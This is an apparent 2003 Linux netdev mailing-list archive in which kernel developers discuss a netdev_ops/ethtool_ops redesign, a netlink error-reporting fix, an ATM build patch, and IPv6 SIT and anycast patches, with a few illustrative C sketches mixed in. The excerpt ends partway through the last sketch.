> 1) The _ops are either too limited in scope, or too wide in scope.
> > We have a bunch of function pointers in struct net_device. > We are adding a bunch more func ptrs in a new struct foo_ops. > > If it is called ethtool_ops, I can support the addition of > struct ethtool_ops *etops; > to struct net_device. > > However, if we call it netdev_ops, the structure's name no longer > describes its purpose. If we call it netdev_ops, we should move ALL the > function pointers in struct net_device into netdev_ops as well, and deal > with the associated driver breakage. > > So, either change the name back to ethtool_ops, or go all the way. > The current name to me implies a job half-done. > > Personally, I would prefer the more radical "move all funcptrs into > netdev_ops". This is closer to other Linux kernel APIs. Either way, I'd vote for netdev_ops, because I want to add generic 'ioctls' that work on struct net_device, not necessarily just ethernet devices. However, it's a minor issue since the code will work regardless. > 3) The func ptrs _count() are totally bogus. We have an unconditional > indirect reference to a function call which does nothing but return a > driver constant. > > I personally think that having ethtool_ops members manually calling > the ->get_drvinfo hook is a _lot_ cleaner than 10,000 foo_count hooks. > > 3.a) Further, we will inevitably be adding more counts in the future. > If we wanted to be truly expandable, and you really don't like the > counts being in struct ethtool_gdrvinfo, then create a struct > ethtool_counts that puts all the constants in one place. Suppose we do this, how will we make a user-space app that tries to read this be backwards/forwards compatible? This is one of the reasons I was hoping for some versioning information that could be probed at run-time from user-space. Could bump the version each time we change something that is difficult to detect in user-space. 
(i.e., adding a new ethtool-cmd is easy to detect because we'll get EINVAL or something when it's not there, and a success when it is, but getting a differently sized struct, or a struct whose members have changed their meaning, will be more difficult to detect I believe.) Programs that do not wish to deal with the cruft of versioning can just ignore it, but ones that are designed to be very robust can do the extra work to deal with the different versions. > > > 4) I don't see why ethtool.h suddenly needs to include linux/types.h, > when it hasn't needed it in all this time until now. If we're changing lots of stuff...it would be nice to change the u32 etc. to something that user-space can easily handle, as ethtool.h is (for better or worse) being included from user-space. Minor issue again as it can be dealt with via typedefs etc. Thanks, Ben -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From garzik@gtf.org Fri Jul 11 12:59:02 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 12:59:07 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BJx22x018079 for ; Fri, 11 Jul 2003 12:59:02 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id A9EC7665C; Fri, 11 Jul 2003 15:58:56 -0400 (EDT) Date: Fri, 11 Jul 2003 15:58:56 -0400 From: Jeff Garzik To: Ben Greear Cc: Matthew Wilcox , netdev@oss.sgi.com, "David S.
Miller" , Arnaldo Carvalho de Melo Subject: Re: [PATCH] netdev_ops Message-ID: <20030711195856.GB30449@gtf.org> References: <20030708163042.GL23597@parcelfarce.linux.theplanet.co.uk> <3F0B2D30.4020102@candelatech.com> <20030708212551.GL1939@parcelfarce.linux.theplanet.co.uk> <20030708.150835.78728697.davem@redhat.com> <20030709161520.GW1939@parcelfarce.linux.theplanet.co.uk> <20030711193215.GH16037@gtf.org> <3F0F153C.4040506@candelatech.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3F0F153C.4040506@candelatech.com> User-Agent: Mutt/1.3.28i X-archive-position: 3971 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev On Fri, Jul 11, 2003 at 12:51:24PM -0700, Ben Greear wrote: > >3) The func ptrs _count() are totally bogus. We have an unconditional > >indirect reference to a function call which does nothing but return a > >driver constant. > > > >I personally think that having ethtool_ops members manually calling > >the ->get_drvinfo hook is a _lot_ cleaner than 10,000 foo_count hooks. > > > >3.a) Further, we will inevitably be adding more counts in the future. > >If we wanted to be truly expandable, and you really don't like the > >counts being in struct ethtool_gdrvinfo, then create a struct > >ethtool_counts that puts all the constants in one place. > > Suppose we do this, how will we make a user-space app that tries to > read this be backwards/forwards compatible? It's trivial to return the existing values in the gdrvinfo struct in addition to a new ethtool_count struct. Full ABI compat is maintained. > >4) I don't see why ethtool.h suddenly needs to include linux/types.h, > >when it hasn't needed it in all this time until now. 
> > If we're changing lots of stuff...it would be nice to change the u32 > etc to something that user-space can easily handle, as ethtool.h is > (for better or worse) being included from user-space. Minor issue > again as it can be dealt with via type-defs etc. ethtool.h isn't included in the "lots of stuff" that is changing :) As you see from Matthew's patch, all changes to ethtool.h are non-essential. Regardless, addressing your point, I consider ethtool.h a kernel-internal header, that's why it uses internal kernel types. Anybody who copies it to userspace must deal with that. It is _not_ intended to be #included directly from userspace. ethtool (the userland program) purposefully does its own typedefs and stuff. Jeff From greearb@candelatech.com Fri Jul 11 13:07:30 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 13:07:35 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BK7U2x018944 for ; Fri, 11 Jul 2003 13:07:30 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h6BK77Kk003058; Fri, 11 Jul 2003 13:07:07 -0700 Message-ID: <3F0F18EB.9020609@candelatech.com> Date: Fri, 11 Jul 2003 13:07:07 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Jeff Garzik CC: Matthew Wilcox , netdev@oss.sgi.com, "David S. 
Miller" , Arnaldo Carvalho de Melo Subject: Re: [PATCH] netdev_ops References: <20030708163042.GL23597@parcelfarce.linux.theplanet.co.uk> <3F0B2D30.4020102@candelatech.com> <20030708212551.GL1939@parcelfarce.linux.theplanet.co.uk> <20030708.150835.78728697.davem@redhat.com> <20030709161520.GW1939@parcelfarce.linux.theplanet.co.uk> <20030711193215.GH16037@gtf.org> <3F0F153C.4040506@candelatech.com> <20030711195856.GB30449@gtf.org> In-Reply-To: <20030711195856.GB30449@gtf.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3972 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev Jeff Garzik wrote: > Regardless, addressing your point, I consider ethtool.h a > kernel-internal header, that's why it uses internal kernel types. > Anybody who copies it to userspace must deal with that. It is _not_ > intended to be #included directly from userspace. ethtool (the userland > program) purposefully does its own typedefs and stuff. Any particular reason to not include it directly? It seems no more likely to cause problems than to use some potentially out-of-date copy in user-space. (And it might make the compile slightly tougher if you are distributing primarily as source.) 
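For context, the typedef approach mentioned in the quoted text could look roughly like this in a user-space program that carries its own copy of the header. This is only a sketch under assumptions: struct example_cmd is a made-up stand-in for a structure taken from such a copy, not a real ethtool structure, and the mapping onto <stdint.h> types is one possible choice.

```c
#include <stdint.h>

/* Kernel-style fixed-width names, defined by the program itself so that
 * a private copy of the header can be compiled outside the kernel. */
typedef uint8_t  u8;
typedef uint16_t u16;
typedef uint32_t u32;
typedef uint64_t u64;

/* Hypothetical stand-in for a command structure from the copied header. */
struct example_cmd {
	u32 cmd;	/* command number */
	u32 value;	/* argument or result */
};
```

The typedefs have to appear before the copied header is included, which is the maintenance burden being debated here.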
Ben -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From willy@www.linux.org.uk Fri Jul 11 13:22:24 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 13:22:28 -0700 (PDT) Received: from www.linux.org.uk (IDENT:Ps7Jkti7p0v3eSE3YE9HD4rxkVLvkPRO@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BKMM2x019383 for ; Fri, 11 Jul 2003 13:22:23 -0700 Received: from willy by www.linux.org.uk with local (Exim 4.14) id 19b2aI-0003WB-NJ; Fri, 11 Jul 2003 19:25:30 +0100 Date: Fri, 11 Jul 2003 19:25:30 +0100 From: Matthew Wilcox To: Jeff Garzik Cc: Matthew Wilcox , netdev@oss.sgi.com Subject: Re: [PATCH] Move eth_mac_addr and eth_change_mtu Message-ID: <20030711182530.GH20424@parcelfarce.linux.theplanet.co.uk> References: <20030711181946.GG20424@parcelfarce.linux.theplanet.co.uk> <20030711182330.GC16037@gtf.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030711182330.GC16037@gtf.org> User-Agent: Mutt/1.4.1i X-archive-position: 3973 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: willy@debian.org Precedence: bulk X-list: netdev On Fri, Jul 11, 2003 at 02:23:30PM -0400, Jeff Garzik wrote: > On Fri, Jul 11, 2003 at 07:19:46PM +0100, Matthew Wilcox wrote: > > Move eth_mac_addr() and eth_change_mtu() from drivers/net/net_init.c > > to net/ethernet/eth.c > > Why? It's not used outside of net_init.c AFAICS. Preparation for the next stage of netdev_ops > And even so, don't you want to export those symbols? Yep, you're right, I'll need to do that too. -- "It's not Hollywood. War is real, war is primarily not about defeat or victory, it is about death. I've seen thousands and thousands of dead bodies. Do you think I want to have an academic debate on this subject?" 
-- Robert Fisk From willy@www.linux.org.uk Fri Jul 11 14:05:25 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 14:05:31 -0700 (PDT) Received: from www.linux.org.uk (IDENT:jA8tYPLAF0T/9r9Y9pw9KeedaHMHDFiC@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BL5O2x021030 for ; Fri, 11 Jul 2003 14:05:24 -0700 Received: from willy by www.linux.org.uk with local (Exim 4.14) id 19b550-0006y8-Pb; Fri, 11 Jul 2003 22:05:22 +0100 Date: Fri, 11 Jul 2003 22:05:22 +0100 From: Matthew Wilcox To: Jeff Garzik Cc: Matthew Wilcox , netdev@oss.sgi.com Subject: Re: [PATCH] Move eth_mac_addr and eth_change_mtu Message-ID: <20030711210522.GM20424@parcelfarce.linux.theplanet.co.uk> References: <20030711181946.GG20424@parcelfarce.linux.theplanet.co.uk> <20030711182330.GC16037@gtf.org> <20030711182530.GH20424@parcelfarce.linux.theplanet.co.uk> <3F0F24B1.5050200@pobox.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3F0F24B1.5050200@pobox.com> User-Agent: Mutt/1.4.1i X-archive-position: 3974 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: willy@debian.org Precedence: bulk X-list: netdev On Fri, Jul 11, 2003 at 04:57:21PM -0400, Jeff Garzik wrote: > Well, I don't see/understand this next-stage, so elaboration would be > nice. As-is, I do not support merging this patch. It's the next stage you're calling for -- move these functions: dev->change_mtu = eth_change_mtu; dev->hard_header = eth_header; dev->rebuild_header = eth_rebuild_header; dev->set_mac_address = eth_mac_addr; dev->hard_header_cache = eth_header_cache; dev->header_cache_update= eth_header_cache_update; dev->hard_header_parse = eth_header_parse; into netdev_ops. Which means each driver will need to see them. 
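To make the idea concrete, here is a small user-space sketch of function pointers collected into one ops structure that several devices share. All ex_* names are hypothetical; neither the real struct net_device nor any proposed netdev_ops layout is reproduced here, and the 68..1500 MTU range is an assumption made for the example.

```c
struct ex_dev;

/* Hypothetical ops table: one instance can serve every Ethernet device. */
struct ex_ops {
	int (*change_mtu)(struct ex_dev *dev, int new_mtu);
};

struct ex_dev {
	int mtu;
	const struct ex_ops *ops;	/* shared, read-only table */
};

/* Assumed range check; returns 0 on success, -1 on a rejected value. */
static int ex_eth_change_mtu(struct ex_dev *dev, int new_mtu)
{
	if (new_mtu < 68 || new_mtu > 1500)
		return -1;
	dev->mtu = new_mtu;
	return 0;
}

static const struct ex_ops ex_eth_ops = {
	.change_mtu = ex_eth_change_mtu,
};

/* Setup helper: the driver calls this and never names the ops itself. */
static void ex_ether_setup(struct ex_dev *dev)
{
	dev->mtu = 1500;
	dev->ops = &ex_eth_ops;
}
```

With this shape, per-device state stays in struct ex_dev while the table is common, so a driver only needs to see the individual functions if it fills in the table itself.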
I thought I could justify moving these functions already on the grounds that if you were looking for the definition of eth_change_mtu(), net_init.c would be a much less likely place to look than net/ethernet/eth.c -- "It's not Hollywood. War is real, war is primarily not about defeat or victory, it is about death. I've seen thousands and thousands of dead bodies. Do you think I want to have an academic debate on this subject?" -- Robert Fisk From willy@www.linux.org.uk Fri Jul 11 14:56:42 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 14:56:50 -0700 (PDT) Received: from www.linux.org.uk (IDENT:RmxoIlt5ODsZ517Je9ENpFD1oPdh+ibf@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BLue2x022731 for ; Fri, 11 Jul 2003 14:56:41 -0700 Received: from willy by www.linux.org.uk with local (Exim 4.14) id 19b5sd-0000Mj-MV; Fri, 11 Jul 2003 22:56:39 +0100 Date: Fri, 11 Jul 2003 22:56:39 +0100 From: Matthew Wilcox To: Jeff Garzik Cc: Matthew Wilcox , netdev@oss.sgi.com Subject: Re: [PATCH] Move eth_mac_addr and eth_change_mtu Message-ID: <20030711215639.GN20424@parcelfarce.linux.theplanet.co.uk> References: <20030711181946.GG20424@parcelfarce.linux.theplanet.co.uk> <20030711182330.GC16037@gtf.org> <20030711182530.GH20424@parcelfarce.linux.theplanet.co.uk> <3F0F24B1.5050200@pobox.com> <20030711210522.GM20424@parcelfarce.linux.theplanet.co.uk> <3F0F294F.4060804@pobox.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3F0F294F.4060804@pobox.com> User-Agent: Mutt/1.4.1i X-archive-position: 3975 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: willy@debian.org Precedence: bulk X-list: netdev On Fri, Jul 11, 2003 at 05:17:03PM -0400, Jeff Garzik wrote: > Matthew Wilcox wrote: > >On Fri, Jul 11, 2003 at 04:57:21PM -0400, Jeff Garzik wrote: > > > >>Well, I don't see/understand this 
next-stage, so elaboration would be > >>nice. As-is, I do not support merging this patch. > > > > > >It's the next stage you're calling for -- move these functions: > > > > dev->change_mtu = eth_change_mtu; > > dev->hard_header = eth_header; > > dev->rebuild_header = eth_rebuild_header; > > dev->set_mac_address = eth_mac_addr; > > dev->hard_header_cache = eth_header_cache; > > dev->header_cache_update= eth_header_cache_update; > > dev->hard_header_parse = eth_header_parse; > > > >into netdev_ops. Which means each driver will need to see them. > > Drivers don't need to see them now, they shouldn't need to see them > after netdev_ops. > > It's hidden by ether_setup. Umm. Technically, yes. Seems a bit ugly to assign to the netdev_ops struct which is shared between the devices. Won't _break_ anything (unless some crazed person has a driver which drives the ethernet and token ring versions of the same chip ;-) -- "It's not Hollywood. War is real, war is primarily not about defeat or victory, it is about death. I've seen thousands and thousands of dead bodies. Do you think I want to have an academic debate on this subject?" -- Robert Fisk From davem@redhat.com Fri Jul 11 22:18:52 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 22:19:03 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6C5Iq2x029465 for ; Fri, 11 Jul 2003 22:18:52 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id WAA31743; Fri, 11 Jul 2003 22:09:05 -0700 Date: Fri, 11 Jul 2003 22:09:05 -0700 From: "David S. 
Miller" To: James Morris Cc: jkenisto@us.ibm.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, akpm@osdl.org, jgarzik@pobox.com, alan@lxorguk.ukuu.org.uk, rddunlap@osdl.org, kuznet@ms2.inr.ac.ru Subject: Re: [PATCH - RFC] [1/2] 2.6 must-fix list - kernel error reporting Message-Id: <20030711220905.2ea9ebc5.davem@redhat.com> In-Reply-To: References: <3F0DB9A5.23723BE1@us.ibm.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3976 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Sat, 12 Jul 2003 01:37:44 +1000 (EST) James Morris wrote: > On Thu, 10 Jul 2003, Jim Keniston wrote: > > > That begs the question: do we trust that nobody but the kernel will send > > packets to a NETLINK_KERROR socket? Ordinary users can't, but any root > > application can. Without kerror_netlink_rcv(), such packets don't get > > dequeued. > > Indeed, the kernel socket buffer fills up. > > I think this needs to be addressed in the netlink code, per the patch > below. Looks good, I'll apply this. From davem@redhat.com Fri Jul 11 22:51:23 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 22:52:02 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6C5oh2x029936 for ; Fri, 11 Jul 2003 22:51:23 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id WAA31830; Fri, 11 Jul 2003 22:41:42 -0700 Date: Fri, 11 Jul 2003 22:41:42 -0700 From: "David S. 
Miller" To: James Morris Cc: jkenisto@us.ibm.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, akpm@osdl.org, jgarzik@pobox.com, alan@lxorguk.ukuu.org.uk, rddunlap@osdl.org, kuznet@ms2.inr.ac.ru Subject: Re: [PATCH - RFC] [1/2] 2.6 must-fix list - kernel error reporting Message-Id: <20030711224142.557b5b5e.davem@redhat.com> In-Reply-To: References: <3F0DB9A5.23723BE1@us.ibm.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3977 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Sat, 12 Jul 2003 01:37:44 +1000 (EST) James Morris wrote: > Indeed, the kernel socket buffer fills up. > > I think this needs to be addressed in the netlink code, per the patch > below. ... > + /* Don't bother queuing skb if kernel socket has no input function */ > + if (nlk->pid == 0 && !nlk->data_ready) > + goto no_dst; > + Oops, turns out this doesn't work. data_ready is never NULL, look at how netlink_kernel_create() works. Also, the broadcast case probably needs to be handled too? As an aside, to be honest what's so wrong with the socket receive buffer filling up? The damage is limited to the receive buffer size of the kernel netlink socket, but that's it. From davem@redhat.com Fri Jul 11 22:52:58 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 22:53:04 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6C5qw2x030111 for ; Fri, 11 Jul 2003 22:52:58 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id WAA31850; Fri, 11 Jul 2003 22:44:13 -0700 Date: Fri, 11 Jul 2003 22:44:13 -0700 From: "David S. 
Miller" To: Krzysztof Halasa Cc: netdev@oss.sgi.com Subject: Re: 2.5.74 X.25+LAPB still kills the kernel Message-Id: <20030711224413.6aa70649.davem@redhat.com> In-Reply-To: References: X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3978 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On 11 Jul 2003 19:27:28 +0200 Krzysztof Halasa wrote: > No need to actually use X.25+LAPB, it's enough to just compile it in. Hmmm, if nobody is listening on linux-x25 and neither is the listed "MAINTAINER" eis@baty.hanse.de we should update the linux/MAINTAINERS file to be in sync with reality. Anyways, I'll try to look into this if nobody else does. Thanks for reporting this to the right place finally, as a reward your bug will be looked at and hopefully fixed. From davem@redhat.com Sat Jul 12 00:02:26 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 12 Jul 2003 00:03:00 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6C71k2x031096 for ; Sat, 12 Jul 2003 00:02:26 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id XAA32018; Fri, 11 Jul 2003 23:52:47 -0700 Date: Fri, 11 Jul 2003 23:52:47 -0700 From: "David S. 
Miller" To: chas3@users.sourceforge.net Cc: chas@cmf.nrl.navy.mil, netdev@oss.sgi.com Subject: Re: [PATCH][2.4] more atm changes backported to 2.4 Message-Id: <20030711235247.43f05654.davem@redhat.com> In-Reply-To: <200307102033.h6AKXtsG006493@ginger.cmf.nrl.navy.mil> References: <200307102033.h6AKXtsG006493@ginger.cmf.nrl.navy.mil> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3979 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Thu, 10 Jul 2003 16:31:32 -0400 chas williams wrote: > # ChangeSet 1.1014 -> 1.1015 > # net/atm/lec.c 1.15 -> 1.16 > # > # The following is the BitKeeper ChangeSet Log > # -------------------------------------------- > # 03/06/27 chas@relax.cmf.nrl.navy.mil 1.1015 > # elminate cli, make function names sane > # -------------------------------------------- Forgot some net/atm/lec.h changes for this one Chas? :-( See the patch below I had to add to my tree to get things building again. Chas, please, type "make" in a tree that has only the patches you are sending me applied. I know you said to me this is "hard" for you to do, but after this I really need you to start doing this. Thanks. # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. # This patch includes the following deltas: # ChangeSet 1.1084 -> 1.1085 # net/atm/lec.h 1.4 -> 1.5 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/07/11 davem@nuts.ninka.net 1.1085 # [ATM]: Fix build, missing lec_priv member. 
# -------------------------------------------- # diff -Nru a/net/atm/lec.h b/net/atm/lec.h --- a/net/atm/lec.h Fri Jul 11 23:58:23 2003 +++ b/net/atm/lec.h Fri Jul 11 23:58:23 2003 @@ -101,7 +101,7 @@ establishes multiple Multicast Forward VCCs to us. This list collects all those VCCs. LANEv1 client has only one item in this list. These entries are not aged out. */ - atomic_t lec_arp_lock_var; + atomic_t lec_arp_users; struct atm_vcc *mcast_vcc; /* Default Multicast Send VCC */ struct atm_vcc *lecd; struct timer_list lec_arp_timer; From mika.liljeberg@welho.com Sat Jul 12 00:56:33 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 12 Jul 2003 00:56:47 -0700 (PDT) Received: from hades.pp.htv.fi (cs180094.pp.htv.fi [213.243.180.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6C7tp2x031862 for ; Sat, 12 Jul 2003 00:56:32 -0700 Received: from hades.pp.htv.fi (liljeber@localhost [127.0.0.1]) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) with ESMTP id h6C7tipV001173; Sat, 12 Jul 2003 10:55:44 +0300 Received: (from liljeber@localhost) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) id h6C7thqI001171; Sat, 12 Jul 2003 10:55:43 +0300 X-Authentication-Warning: hades.pp.htv.fi: liljeber set sender to mika.liljeberg@welho.com using -f Subject: [PATCH] IPv6: Allow 6to4 routes with SIT From: Mika Liljeberg To: YOSHIFUJI Hideaki Cc: netdev@oss.sgi.com Content-Type: multipart/mixed; boundary="=-5E2h62/6eEALX4jFy4kC" Message-Id: <1057996543.1142.12.camel@hades> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.0 Date: 12 Jul 2003 10:55:43 +0300 X-archive-position: 3980 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.liljeberg@welho.com Precedence: bulk X-list: netdev --=-5E2h62/6eEALX4jFy4kC Content-Type: text/plain Content-Transfer-Encoding: 7bit Ok, I've separated out the SIT fix. A revised anycast fix will follow. This is against 2.5.75. 
The patch will allow a host to set up SIT tunnels using gateway routes to 6to4 addresses. Previously this only worked with an IPv4-compatible address. Use of the deprecated IPv4-compatible addresses should not be required. Thanks, MikaL --=-5E2h62/6eEALX4jFy4kC Content-Disposition: attachment; filename=2.5.75-sit.udiff Content-Type: text/x-patch; name=2.5.75-sit.udiff; charset=ISO-8859-15 Content-Transfer-Encoding: quoted-printable
diff -ur orig/linux-2.5.75/net/ipv6/sit.c linux-2.5.75/net/ipv6/sit.c
--- orig/linux-2.5.75/net/ipv6/sit.c	2003-07-10 23:14:48.000000000 +0300
+++ linux-2.5.75/net/ipv6/sit.c	2003-07-12 10:00:27.000000000 +0300
@@ -472,10 +472,13 @@
 			addr_type = ipv6_addr_type(addr6);
 		}
 
-		if ((addr_type & IPV6_ADDR_COMPATv4) == 0)
-			goto tx_error_icmp;
+		if (addr_type & IPV6_ADDR_COMPATv4)
+			dst = addr6->s6_addr32[3];
+		else
+			dst = try_6to4(addr6);
 
-		dst = addr6->s6_addr32[3];
+		if (!dst)
+			goto tx_error_icmp;
 	}
 
 	{
--=-5E2h62/6eEALX4jFy4kC-- From mika.liljeberg@welho.com Sat Jul 12 01:13:16 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 12 Jul 2003 01:13:27 -0700 (PDT) Received: from hades.pp.htv.fi (cs180094.pp.htv.fi [213.243.180.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6C8DE2x032402 for ; Sat, 12 Jul 2003 01:13:15 -0700 Received: from hades.pp.htv.fi (liljeber@localhost [127.0.0.1]) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) with ESMTP id h6C8DApV001246; Sat, 12 Jul 2003 11:13:11 +0300 Received: (from liljeber@localhost) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) id h6C8DAZ2001245; Sat, 12 Jul 2003 11:13:10 +0300 X-Authentication-Warning: hades.pp.htv.fi: liljeber set sender to mika.liljeberg@welho.com using -f Subject: [PATCH] IPv6: Fix broken anycast usage From: Mika Liljeberg To: YOSHIFUJI Hideaki Cc: netdev@oss.sgi.com Content-Type: multipart/mixed; boundary="=-z/elxEQiE2HR9qGdA6GJ" Message-Id: <1057997590.1142.31.camel@hades> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.0 Date: 12 Jul 2003 11:13:10
+0300 X-archive-position: 3981 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.liljeberg@welho.com Precedence: bulk X-list: netdev --=-z/elxEQiE2HR9qGdA6GJ Content-Type: text/plain Content-Transfer-Encoding: 7bit This is against 2.5.75. The patch fixes several places where anycast addresses should be treated equivalently with unicast addresses. In particular, this includes tunnels and routes pointing to anycast addresses. I modified ipv6_addr_type() to return IPV6_ADDR_UNICAST also for anycast addresses. IPV6_ADDR_ANYCAST is now added as an additional flag when the address is one of the known anycast addresses. I looked very hard at neighbor discovery and didn't see anything that needs to be changed, but you might want to have a second look. One small difference is that ND will now also try respond to neighbor solicitations coming from known anycast addresses (very unlikely). IMHO, this doesn't need to be policed. In general, there is no reliable way to check if a remote address is anycast, anyway. From RFC2461: Note that an anycast address is syntactically indistinguishable from a unicast address. Thus, nodes sending packets to anycast addresses don't generally know that an anycast address is being used. Throughout the rest of this document, references to unicast addresses also apply to anycast addresses in those cases where the node is unaware that a unicast address is actually an anycast address. 
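The change to ipv6_addr_type() described above can be sketched in user space as follows. The EX_* flag values and the function names are invented for the example and are not the kernel's definitions; the point is only that a caller testing the unicast bit now also accepts a known anycast address.

```c
#include <stdbool.h>

/* Hypothetical flag values, for illustration only. */
enum {
	EX_ADDR_UNICAST = 0x1,
	EX_ADDR_ANYCAST = 0x2,
};

/* Old behaviour: a known anycast address was reported as anycast only. */
static int ex_addr_type_old(bool known_anycast)
{
	return known_anycast ? EX_ADDR_ANYCAST : EX_ADDR_UNICAST;
}

/* New behaviour: always unicast, with anycast as an additional flag. */
static int ex_addr_type_new(bool known_anycast)
{
	int type = EX_ADDR_UNICAST;

	if (known_anycast)
		type |= EX_ADDR_ANYCAST;
	return type;
}

/* A caller (say, tunnel or route setup) that requires a unicast address. */
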